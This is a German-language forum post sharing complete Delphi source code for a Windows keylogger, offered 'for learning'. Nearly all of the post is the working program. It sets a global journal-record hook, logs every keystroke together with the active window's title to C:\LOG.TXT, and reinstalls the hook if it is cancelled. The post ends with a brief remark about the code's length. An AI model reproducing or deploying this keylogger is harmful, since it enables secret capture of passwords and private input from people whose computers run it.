[B] Delphi Keylogger Source

[Gondolin]

Keylogger Source zum lernen

Code:

program KeyLogger;

uses
  Windows, Messages;

var
  szCurApp: string;
  HookHandle, JHHandle: HHook;
  lpMsg: TMsg;


function JHProc(nCode: integer; wParam: Longint; var EventStrut: TEVENTMSG): Longint; stdcall;
var
  szletta, HBuf, ThePath: string;
  hFile, BytesWritten: dword;
  szCurAppNm: array[0..260] of Char;
  Charry: array[0..1] of Char;
  VirtKey, ScanCode: Cardinal;
  KeyState: TKeyBoardState;
  nametext: array[0..32] of Char;
begin
  if (nCode = HC_ACTION) and (EventStrut.message = WM_KEYDOWN)
    then begin
    VirtKey := LOBYTE(EventStrut.paramL);
    ScanCode := HIBYTE(EventStrut.paramL);
    ScanCode := ScanCode shl 16;
    ThePath := 'C:\LOG.TXT';
    hFile := CreateFile(pchar(ThePath), GENERIC_WRITE, FILE_SHARE_WRITE, nil, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
    SetFilePointer(hFile, 0, nil, FILE_END);
    GetWindowText(GetForegroundWindow, szCurAppNm, sizeof(szCurAppNm));
    if szCurAppNm <> szCurApp
      then begin
      szCurApp := szCurAppNm;
      HBuf := #13#10 + #13#10 + '[ ' + szCurAppNm + ' ]' + #13#10;
      WriteFile(hFile, pchar(HBuf)^, length(HBuf), BytesWritten, nil);
    end;
    GetKeyNameText(ScanCode, nametext, sizeof(nametext));
    szletta := #0;
    FillChar(Charry,2,#0);
    if VirtKey = VK_CAPITAL then szletta := #0
    else if VirtKey = VK_SHIFT then szletta := #0
    else if VirtKey = VK_SPACE then szletta := ' '
    else if lstrlen(nametext) > 1 then szletta := '[' + nametext + ']'
    else
    begin
      GetKeyboardState(KeyState);
      ToAscii(VirtKey, ScanCode, KeyState, Charry, 0);
      szletta := Charry;
    end;
    if szletta <> '' then WriteFile(hFile, pchar(szletta)^, length(szletta), BytesWritten, nil);
    CloseHandle(hFile);
  end;
  CallNextHookEx(JHHandle, nCode, wParam, Integer(@EventStrut));
  Result := 0;
end;

begin
  HookHandle := SetWindowsHookEx(WH_JOURNALRECORD, @JHProc, HInstance, 0);
  while 1 = 1
    do begin
    WaitMessage;
    GetMessage(lpMsg, 0, 0, 0);
    if lpMsg.message = WM_CANCELJOURNAL then HookHandle := SetWindowsHookEx(WH_JOURNALRECORD, @JHProc, HInstance, 0);
  end;
end.

/ falls jmd der meinung ist der coude wäre zu lang, dann kann ichs auch in ne text und uploaden oder nopaste nutzen, aber ich denk mal der source is net wirklich lang... oder?